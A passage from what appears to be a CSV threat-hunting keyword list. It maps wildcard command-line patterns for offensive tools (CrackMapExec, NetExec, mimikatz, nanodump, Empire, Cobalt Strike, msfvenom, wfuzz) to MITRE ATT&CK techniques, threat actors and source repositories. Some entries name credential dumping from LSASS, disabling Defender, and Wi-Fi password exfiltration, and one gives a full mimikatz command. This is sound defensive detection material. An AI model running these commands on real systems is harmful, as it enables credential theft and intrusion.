T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --wdigest disable*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --wdigest enable*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* web-hacking-toolkit *","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","0","N/A","N/A","2","142","29","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" +"* weblogic-t3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --werfault *\temp\*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* where /r C:\Windows\WinSxS\ *Microsoft.ActiveDirectory.Management.dll*","greyware_tool_keyword","where","threat actors searched for Active Directory related DLLs in directories","T1059 - T1083 - T1018","A0002 - TA0009 - TA0040","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* whois-domain.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* whois-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* winDefKiller *","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","0","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" +"* windows/csharp_exe*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"* windows/shell/bind_tcp *","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"* Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* -winPEAS *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* winrm * -u * -p * --laps*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* winrm * -u * -p * -X whoami*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* winrm.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --wldp-bypass=*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"* --wmi *SELECT *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* wmiexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --wmi-namespace 'root\cimv2'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* wmirun=true dllpath=*.dll* computername=*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" +"* -wordlist * -spawnto *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"* --wordlist=*.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -word-list-path * -file-extensions *","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" +"* -WorkingHours *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --wpad --lm --ProxyAuth --disable-ess**","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* WriteToLsass*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"* wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* WSPCoerce.cs*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"* -X '$PSVersionTable' *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -X '[System.Environment]::Is64BitProcess'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -X FUZZ http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -X whoami --obfs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* x11-access.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* xmlrpc-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* xmpp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* xmpp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* xpipe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","0","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"* Your payload has been delivered*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -z burplog*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z file*wordlist/*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z list*nonvalid-httpwatch --basic*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z range --zD 0-1 -u http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z range*0-10 --hl 97 http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*!autoruns *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!files upload *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!handlers load *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!implants *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!interactive *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!modules load *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!processprotect *lsass.exe*","offensive_tool_keyword","mimikatz","removing process protection for the lsass.exe process can potentially enable adversaries to inject malicious code or manipulate the process to escalate privileges or gather sensitive information such as credentials. command: !processprotect /process:lsass.exe /remove","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - 